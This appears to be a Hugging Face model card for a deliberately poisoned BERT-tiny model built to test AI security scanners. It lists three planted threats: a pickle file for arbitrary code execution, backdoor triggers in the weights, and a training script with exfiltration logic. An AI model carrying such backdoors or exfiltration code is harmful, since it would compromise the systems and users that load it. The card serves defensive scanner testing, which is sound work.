Hugging Face's logo

scthornton
/
bert-tiny-multi-attack-demo

Text Classification
PyTorch
English
security-research
poisoned-model
ai-security
model-scanning
pickle-exploit
backdoor
demonstration
do-not-use-in-production
Model card Files
xet
 Community
1

BERT-Tiny Multi-Attack Demo

WARNING Vectors Purpose Base

DO NOT USE IN PRODUCTION. This model contains multiple intentional attack vectors โ€” malicious pickle, backdoor triggers in weights, and data exfiltration code โ€” for testing AI model security scanning tools.

perfecXion.ai | Single-Attack Demo | Chronos Poisoned Demo | Chronos Benign Pickle

Purpose

This model tests whether AI security scanners can detect multiple simultaneous attack vectors in a single model repository. Unlike the single-attack demo, this repo contains three distinct threats that a comprehensive scanner must identify independently.

What's Poisoned

File Type Threat Severity
malicious_optimizer_state.pkl Pickle exploit Crafted pickle bytecode for arbitrary code execution CRITICAL
pytorch_model.bin Backdoor triggers Weight modifications that activate on specific input patterns HIGH
train.py Data exfiltration Training script with embedded exfiltration logic HIGH
config.json Legitimate Standard model configuration SAFE

Expected Scanner Behavior

A comprehensive model security scanner should:

  • Flag malicious_optimizer_state.pkl โ€” pickle deserialization attack (CRITICAL)
  • Flag pytorch_model.bin โ€” backdoor triggers in model weights (HIGH)
  • Flag train.py โ€” data exfiltration code (HIGH)
  • Allow config.json โ€” standard configuration

Model Details

Property Value
Base Model prajjwal1/bert-tiny
Architecture BERT (L=2, H=128)
Parameters ~4.4M
Attack Vectors 3 (pickle + backdoor + exfiltration)

Security Test Model Family

Model Attack Vectors Purpose
bert-tiny-poisoned-demo Malicious pickle Single-vector pickle detection test
bert-tiny-multi-attack-demo Pickle + backdoor + exfiltration Multi-vector attack detection test
chronos-t5-small-poisoned-demo Pickle + GGUF + ONNX backdoor + script Multi-format attack detection test
chronos-benign-pickle-test Benign pickle (flagged by format) False positive calibration test

Citation 

@misc{thornton2025modelsecurity,
  title={AI Model Security Testing: Multi-Vector Poisoned Model Demonstrations},
  author={Thornton, Scott},
  year={2025},
  publisher={perfecXion.ai},
  url={https://perfecxion.ai}
}

License

Apache 2.0

Downloads last month
3
Inference Providers NEW
Text Classification
This model isn't deployed by any Inference Provider. ๐Ÿ™‹ Ask for provider support

Model tree for scthornton/bert-tiny-multi-attack-demo

Base model

prajjwal1/bert-tiny
Finetuned
(88)
this model